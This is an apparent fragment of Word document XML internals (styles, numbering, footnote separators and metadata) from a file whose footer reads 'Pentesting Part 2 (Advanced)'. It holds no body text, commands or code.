    <w:sectPr w:rsidR="00CA5B55" w:rsidRPr="00993E9F" w:rsidSect="00370241">
      <w:footerReference w:type="even" r:id="rId7"/>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F0BA9" w14:textId="77777777" w:rsidR="005B1928" w:rsidRDefault="005B1928" w:rsidP="0069098B">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="79CA6E3D" w14:textId="77777777" w:rsidR="005B1928" w:rsidRDefault="005B1928" w:rsidP="00690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Neue">
    <w:altName w:val="Segoe UI Symbol"/>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1B149" w14:textId="77777777" w:rsidR="0069098B" w:rsidRDefault="0069098B" w:rsidP="00EE6ED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335A73" w14:textId="77777777" w:rsidR="0069098B" w:rsidRDefault="0069098B" w:rsidP="0069098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63BCC" w14:textId="3735BAF0" w:rsidR="00E474A1" w:rsidRDefault="00E474A1">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:r>
      <w:t>Pentesting Part 2 (Advanced)</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="42A4AA83" w14:textId="77777777" w:rsidR="0069098B" w:rsidRDefault="0069098B" w:rsidP="0069098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A2AC2" w14:textId="77777777" w:rsidR="005B1928" w:rsidRDefault="005B1928" w:rsidP="0069098B">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="17CAC1FA" w14:textId="77777777" w:rsidR="005B1928" w:rsidRDefault="005B1928" w:rsidP="006909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0000019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91E53BF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BCFC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9E062F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3A100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883619"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0046D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4F406F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="229C0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355D18"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F98ACBC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A827F1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8D5A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5B5160"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="02F2566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3C099C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9E441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A96AF5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F9467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7B6161"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4504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7A5E8E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="825A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D16A7E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="261E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5F013C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A0100C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C25EF7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="04A699F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233E2F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B624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011778"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F0A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6"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="12"/>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746"/>
    <w:rsid w:val="00003114"/>
    <w:rsid w:val="00036243"/>
    <w:rsid w:val="000E128E"/>
    <w:rsid w:val="001042CE"/>
    <w:rsid w:val="001420A8"/>
    <w:rsid w:val="00156791"/>
    <w:rsid w:val="00182EA9"/>
    <w:rsid w:val="002035B0"/>
    <w:rsid w:val="00245110"/>
    <w:rsid w:val="002461AC"/>
    <w:rsid w:val="002475CC"/>
    <w:rsid w:val="00255419"/>
    <w:rsid w:val="00276302"/>
    <w:rsid w:val="00293D0F"/>
    <w:rsid w:val="002A01ED"/>
    <w:rsid w:val="00326EEF"/>
    <w:rsid w:val="00335746"/>
    <w:rsid w:val="00363905"/>
    <w:rsid w:val="0036700E"/>
    <w:rsid w:val="00374D4F"/>
    <w:rsid w:val="0038425C"/>
    <w:rsid w:val="00384C61"/>
    <w:rsid w:val="003A5598"/>
    <w:rsid w:val="00413062"/>
    <w:rsid w:val="00415C98"/>
    <w:rsid w:val="00465C17"/>
    <w:rsid w:val="004B0BBB"/>
    <w:rsid w:val="004E43D6"/>
    <w:rsid w:val="005B1928"/>
    <w:rsid w:val="005C247E"/>
    <w:rsid w:val="005F5611"/>
    <w:rsid w:val="0062434A"/>
    <w:rsid w:val="00686C68"/>
    <w:rsid w:val="0069098B"/>
    <w:rsid w:val="006A513C"/>
    <w:rsid w:val="006C1D3C"/>
    <w:rsid w:val="006C5B3F"/>
    <w:rsid w:val="00701B96"/>
    <w:rsid w:val="00715ACE"/>
    <w:rsid w:val="0078438D"/>
    <w:rsid w:val="00796AA4"/>
    <w:rsid w:val="007B56E4"/>
    <w:rsid w:val="007F5D1C"/>
    <w:rsid w:val="00832291"/>
    <w:rsid w:val="008370FB"/>
    <w:rsid w:val="00885C88"/>
    <w:rsid w:val="00910058"/>
    <w:rsid w:val="0092594B"/>
    <w:rsid w:val="00971D29"/>
    <w:rsid w:val="009920D4"/>
    <w:rsid w:val="00993E9F"/>
    <w:rsid w:val="009B4489"/>
    <w:rsid w:val="009C79DE"/>
    <w:rsid w:val="009D654F"/>
    <w:rsid w:val="00A17BF9"/>
    <w:rsid w:val="00A22CF7"/>
    <w:rsid w:val="00A26C61"/>
    <w:rsid w:val="00A45A79"/>
    <w:rsid w:val="00A946C6"/>
    <w:rsid w:val="00AC0834"/>
    <w:rsid w:val="00AE6580"/>
    <w:rsid w:val="00B64AFA"/>
    <w:rsid w:val="00BB3A74"/>
    <w:rsid w:val="00BB4695"/>
    <w:rsid w:val="00BD1A09"/>
    <w:rsid w:val="00BD345D"/>
    <w:rsid w:val="00CA5B55"/>
    <w:rsid w:val="00CE294B"/>
    <w:rsid w:val="00DA5284"/>
    <w:rsid w:val="00E33739"/>
    <w:rsid w:val="00E474A1"/>
    <w:rsid w:val="00E97C33"/>
    <w:rsid w:val="00F00CAB"/>
    <w:rsid w:val="00F035EB"/>
    <w:rsid w:val="00F32C68"/>
    <w:rsid w:val="00F6760B"/>
    <w:rsid w:val="00F709B9"/>
    <w:rsid w:val="00FC0D4D"/>
    <w:rsid w:val="00FD183B"/>
    <w:rsid w:val="00FE0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3BC43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5419"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="0033574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74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35746"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00335746"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="008322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832291"/>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32291"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00832291"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0069098B"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="0069098B"/>
  </w:style>
  <w:style w:type="character" w:styleId="PageNumber">
    <w:name w:val="page number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0069098B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E474A1"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00E474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1691">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="972713049">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1098405345">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1616935753">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1971327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1412</Words>
  <Characters>8055</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9449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McCanna</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Patrick McCanna</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <cp:lastPrinted>2016-07-20T23:03:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-09-20T17:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-09-20T17:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>